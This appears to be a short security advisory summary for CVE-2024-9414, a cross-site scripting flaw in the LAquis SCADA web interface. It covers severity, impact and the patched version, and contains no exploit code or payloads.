CVE-2024-9414

Vulnerability

Overview

LAquis SCADA version 4.7.1.511 contains a cross-site scripting (XSS) vulnerability in its web interface, classified under CWE-79 as Improper Neutralization of Input During Web Page Generation [1]. The flaw stems from insufficient sanitization of user-supplied input before it is rendered in a web page, allowing an attacker to inject arbitrary HTML or JavaScript code [1].

Exploitation

Prerequisites

The vulnerability can be exploited remotely over a network with low attack complexity, requiring user interaction but no privileges (CVSS v3.1 vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N) [1]. An attacker could craft a malicious link or input that, when processed by an authenticated user's browser, executes attacker-controlled scripts within the context of the affected SCADA web application [1].

Potential

Impact

Successful exploitation enables an attacker to steal session cookies—potentially leading to account takeover—redirect users to malicious sites, or perform unauthorized actions on behalf of the victim [1]. Because the software is used in critical infrastructure sectors such as energy, water, and chemicals, the impact can extend to operational technology environments if the web interface is exposed [1].

Mitigation

Status

LCDS has released version 4.7.1.611 (and newer) to address the vulnerability; upgrading is strongly recommended [1]. Until patching is complete, CISA advises minimizing network exposure of SCADA systems, isolating control networks with firewalls, and restricting remote access [1]. No evidence of active exploitation has been reported at the time of publication, though the vulnerability is remotely exploitable with low complexity [1].